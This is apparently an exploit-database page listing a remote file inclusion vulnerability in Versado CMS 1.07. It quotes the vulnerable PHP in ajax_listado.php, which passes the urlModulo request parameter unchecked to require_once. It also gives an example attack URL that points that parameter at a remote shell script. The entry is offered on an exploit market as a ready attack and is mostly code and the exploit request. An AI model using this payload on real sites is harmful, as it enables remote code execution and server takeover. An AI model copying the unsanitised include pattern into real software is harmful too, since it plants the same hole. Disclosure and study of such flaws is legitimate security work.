[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Versado CMS 1.07 (ajax_listado.php urlModulo) RFI Vulnerability

Author
kezzap66345
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-1826
Category
web applications
Date add
03-05-2007
Platform
unsorted
===============================================================
Versado CMS 1.07 (ajax_listado.php urlModulo) RFI Vulnerability
===============================================================



##############################################################################################
##############################################################################################
#Versado CMS  <=  Remote File Inclusion Vulnerability
#
#Dork::(
#
#Vuln Code
#############################################################################
#
#ERROR:includes/ajax_listado.php
#
# if(!empty($_GET['urlModulo'])){
       require_once($_GET['urlModulo']);
}else if(!empty($_POST['urlModulo'])){
       require_once($_POST['urlModulo']);


#BUG:
#
#Example:http://site.com/includes/ajax_listado.php?urlModulo=[[Sh3LL Script]]
#Script Download
#############################################################################
#
#Original W3b Site###########################################################
#
#http://www.versado.com.ar/control/index.php
#
#Special Thanks:##### x0r0n ##### ajan ##### siircicocuk#####################
#############################################################################
#############################################################################
#############################################################################



#  0day.today [2024-09-28]  #